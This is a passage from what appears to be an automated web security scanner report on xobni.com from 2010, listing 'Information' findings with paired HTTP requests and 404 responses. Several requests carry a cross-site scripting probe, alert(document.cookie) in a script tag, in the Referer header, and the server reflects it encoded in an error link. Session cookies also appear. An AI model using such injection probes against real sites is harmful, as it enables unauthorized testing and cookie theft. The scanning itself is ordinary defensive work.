<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/mobilebb?lc=en'>English</a><a href='/homepage/productmenu/mobilebb?lc=de'>Deutsch</a><a href='/homepage/productmenu/mobilebb?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div cla
...[SNIP]...

Request 2

GET /homepage/productmenu/mobilebb HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7763

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/mobilebb?lc=en'>English</a><a href='/homepage/productmenu/mobilebb?lc=de'>Deutsch</a><a href='/homepage/productmenu/mobilebb?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'
...[SNIP]...

9.7. http://www.xobni.com/homepage/productmenu/plus

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /homepage/productmenu/plus

Request 1

GET /homepage/productmenu/plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7871

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/plus?lc=en'>English</a><a href='/homepage/productmenu/plus?lc=de'>Deutsch</a><a href='/homepage/productmenu/plus?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldown
...[SNIP]...

Request 2

GET /homepage/productmenu/plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7751

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/plus?lc=en'>English</a><a href='/homepage/productmenu/plus?lc=de'>Deutsch</a><a href='/homepage/productmenu/plus?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return fa
...[SNIP]...

9.8. http://www.xobni.com/homepage/productmenu/xobnione

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /homepage/productmenu/xobnione

Request 1

GET /homepage/productmenu/xobnione HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/xobnione?lc=en'>English</a><a href='/homepage/productmenu/xobnione?lc=de'>Deutsch</a><a href='/homepage/productmenu/xobnione?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div cla
...[SNIP]...

Request 2

GET /homepage/productmenu/xobnione HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7763

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/homepage/productmenu/xobnione?lc=en'>English</a><a href='/homepage/productmenu/xobnione?lc=de'>Deutsch</a><a href='/homepage/productmenu/xobnione?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'
...[SNIP]...

9.9. http://www.xobni.com/learnmore/mobile/buynow

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /learnmore/mobile/buynow

Request 1

GET /learnmore/mobile/buynow HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flearnmore%2Fmobile%2F&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/buynow?lc=en'>English</a><a href='/learnmore/mobile/buynow?lc=de'>Deutsch</a><a href='/learnmore/mobile/buynow?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'clic
...[SNIP]...

Request 2

GET /learnmore/mobile/buynow HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/buynow?lc=en'>English</a><a href='/learnmore/mobile/buynow?lc=de'>Deutsch</a><a href='/learnmore/mobile/buynow?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return false;"
...[SNIP]...

9.10. http://www.xobni.com/learnmore/mobile/trial

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /learnmore/mobile/trial

Request 1

GET /learnmore/mobile/trial HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/mobile/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flearnmore%2Fmobile%2F&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/learnmore/mobile/trial?lc=en'>English</a><a href='/learnmore/mobile/trial?lc=de'>Deutsch</a><a href='/learnmore/mobile/trial?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click',
...[SNIP]...

Request 2

GET /learnmore/mobile/trial HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
